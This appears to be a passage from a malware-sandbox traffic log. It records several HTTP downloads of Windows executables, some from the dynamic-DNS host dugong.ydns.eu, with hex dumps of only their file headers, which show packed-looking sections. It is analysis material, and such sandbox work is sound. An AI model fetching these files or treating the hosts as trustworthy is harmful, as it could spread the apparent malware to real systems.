                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 05:36:07 GMTETag: "1cf600-62fa5e1f716bb"Accept-Ranges: bytesContent-Length: 1897984Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 1d 1b bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 74 04 00 00 b0 00 00 00 00 00 00 00 10 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4b 00 00 04 00 00 f8 d1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 b0 05 00 6b 00 00 00 00 a0 05 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 05 00 00 10 00 00 00 9a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 a0 05 00 00 04 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 05 00 00 02 00 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 c0 05 00 00 02 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 71 69 67 6d 79 6c 6d 00 20 1a 00 00 e0 30 00 00 1c 1a 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 64 62 69 61 6d 65 62 00 10 00 00 00 00 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:26:50 GMTETag: "30bc00-62fa69759d0b7"Accept-Ranges: bytesContent-Length: 3193856Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 c9 c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f0 04 00 00 b4 00 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 62 70 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 20 06 00 6b 00 00 00 00 10 06 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 00 06 00 00 10 00 00 00 00 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 fc 02 00 00 00 10 06 00 00 02 00 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 20 06 00 00 02 00 00 00 12 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 77 6e 6e 6e 62 67 6f 00 90 2a 00 00 30 06 00 00 82 2a 00 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 68 7a 6a 79 6b 74 6b 00 10 00 00 00 c0 30 00 00 04 00 00 00 96 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 9a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:11:31 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:45 GMTETag: "a7550-6288a270bb76e"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:27:18 GMTETag: "1bb000-62fa69900a91a"Accept-Ranges: bytesContent-Length: 1814528Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 40 3d c2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 69 00 00 04 00 00 e2 50 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6a 67 76 65 6b 77 79 00 10 1a 00 00 80 4f 00 00 0a 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 72 61 6d 6c 62 64 71 00 10 00 00 00 90 69 00 00 04 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 69 00 00 22 00 00 00 8e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:11:32 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "94750-6288a270e7691"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:11:33 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "6dde8-6288a270f12d2"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 